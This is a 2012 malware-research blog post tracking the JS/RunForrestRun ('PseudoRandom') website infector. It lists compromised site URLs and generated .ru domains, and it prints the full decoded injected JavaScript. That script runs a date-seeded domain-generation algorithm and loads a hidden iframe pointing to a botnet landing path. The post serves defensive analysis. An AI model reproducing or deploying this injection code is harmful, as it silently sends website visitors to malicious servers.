Monday, October 29, 2012

The crusaders' note : Suspected JS/RunForrestRun aka PseudoRandom's NEW bad actor scheme is on going..

Following the previous blog posts, the cases of PseudoRandom or JS/RunForrestRun infector, in this Crusade we found the new bad actor's scheme is spreading new infection using this malicious obfuscation random infector.
We released the details in our pastebin here: --->>[PASTEBIN], and will summarize the details as per follows:
NEW infectors is popping up since Oct26th as per below urls:
h00p://fig.is/2010/12/ny-heimasi??a-felags-islenskra-gigtarl??kna/?kna/feed
h00p://fig.is/2012/01/althjodlegt-thing-um-scleroderma/feed
h00p://fig.is/2010/12/ny-heimasi??a-felags-islenskra-gigtarl??kna/feed
h00p://fig.is/2010/12/ny-heimasi%C3%B0a-felags-islenskra-gigtarl%C3%A6kna/?kna/feed
h00p://fig.is/2010/12/ny-heimasi?kna/feed

h00p://www.imaginactionstunts.com/calendar/past
h00p://www.imaginactionstunts.com/action-team/profil-mathieu-ledoux/feed/
h00p://www.imaginactionstunts.com/action-team/profil-sebastien-rouleau/feed
h00p://www.imaginactionstunts.com/action-team/profil-mike-chute/feed
h00p://www.imaginactionstunts.com/action-team/profil-thomas-liccioni
h00p://www.imaginactionstunts.com/action-team/profil-jean-sebastien-cote/feed/
h00p://www.imaginactionstunts.com/action-team/profil-stephane-lefebvre/feed/

h00p://browsersphere.com/
h00p://suesat-recycle.com/plugins/system/rokbox/rokbox.js
h00p://www.cityenvies.com/
h00p://icaihyd.org/js/stepcarousel.js
h00p://isveren.net/organize_sanayi_bolgeleri
h00p://www.anteaagency.cz/js/jquery.colorbox-min.js
h00p://idealbench.com/js/bottom.js
The decoded PseudoRandom is as per below hexed ones..
function nextRandomNumber(){
  var hi = this .seed / this .Q;
  var lo = this .seed % this .Q;
  var test = this .A * lo - this .R * hi;
  if (test > 0){
    this .seed = test;
  }
  else {
    this .seed = test + this .M;
  }
  return (this .seed * this .oneOverM);
}
function RandomNumberGenerator(unix){
  var d = new Date(unix * 1000);
  var s = d.getHours() > 12 ? 1 : 0;
  this .seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.
  round(s * 0xFFF));
  this .A = 48271;
  this .M = 2147483647;
  this .Q = this .M / this .A;
  this .R = this .M % this .A;
  this .oneOverM = 1.0 / this .M;
  this .next = nextRandomNumber;
  return this ;
}
function createRandomNumber(r, Min, Max){
  return Math.round((Max - Min) * r.next() + Min);
}
function generatePseudoRandomString(unix, length, zone){
  var rand = new RandomNumberGenerator(unix);
  var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o'
  , 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  var str = '';
  for (var i = 0; i < length; i ++ ){
    str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  }
  return str + '.' + zone;
}
setTimeout(function (){
  try {
    if (typeof iframeWasCreated == "undefined"){
      iframeWasCreated = true;
      var unix = Math.round( + new Date() / 1000);
      var domainName = generatePseudoRandomString(unix, 16, 'ru');
      ifrm = document.createElement("IFRAME");
      ifrm.setAttribute("src", "h00p://" + domainName + "/runforestrun?sid=botnet2");
      ifrm.style.width = "0px";
      ifrm.style.height = "0px";
      ifrm.style.visibility = "hidden";
      document.body.appendChild(ifrm);
    }
  }
  catch (e){
  }
}
, 500);
All urls were extracted as per below snips, the complete - urls is as per pasted here:--->>[PASTEBIN]
Sat Dec 31 19:00:01 EST 2011-http://yhzktxbspmeioevy.ru/runforestrun?sid=botnet2
Sun Jan 1 07:30:00 EST 2012-http://kxfcnwlyyohascji.ru/runforestrun?sid=botnet2
Sun Jan 1 19:59:59 EST 2012-http://ndvgpxdugiihprox.ru/runforestrun?sid=botnet2
Mon Jan 2 08:29:58 EST 2012-http://wjikjkybqouienfm.ru/runforestrun?sid=botnet2
Mon Jan 2 20:59:57 EST 2012-http://yowoyitslewxwwrl.ru/runforestrun?sid=botnet2
Tue Jan 3 09:29:56 EST 2012-http://jwkynwfxjqdqqmji.ru/runforestrun?sid=botnet2
Tue Jan 3 21:59:55 EST 2012-http://lcbfcpzjpyvoheuj.ru/runforestrun?sid=botnet2
Wed Jan 4 10:29:54 EST 2012-http://vjnhblgryauqcpmr.ru/runforestrun?sid=botnet2
Wed Jan 4 22:59:53 EST 2012-http://xocnrffrwjwryily.ru/runforestrun?sid=botnet2
Thu Jan 5 11:29:52 EST 2012-http://iwoughjskqxnoury.ru/runforestrun?sid=botnet2
Thu Jan 5 23:59:51 EST 2012-http://kcgbtgkouhxwzqce.ru/runforestrun?sid=botnet2
Fri Jan 6 12:29:50 EST 2012-http://tirdttcivfplnrds.ru/runforestrun?sid=botnet2
Sat Jan 7 00:59:49 EST 2012-http://gwtrhozqbvudulyl.ru/runforestrun?sid=botnet2
Sat Jan 7 13:29:48 EST 2012-http://jbkxeiekxelpidpi.ru/runforestrun?sid=botnet2
   :
(and so on...)
The moral of this findings are: 1. This time Pseudorandom not extracted domains BUT full infected URLs. 2. The double or maybe tripple obfuscation found in recent Pseudorandom landing html.

#MalwareMustDie! (Special thanks to EO for great crack!!)

No comments:

Post a Comment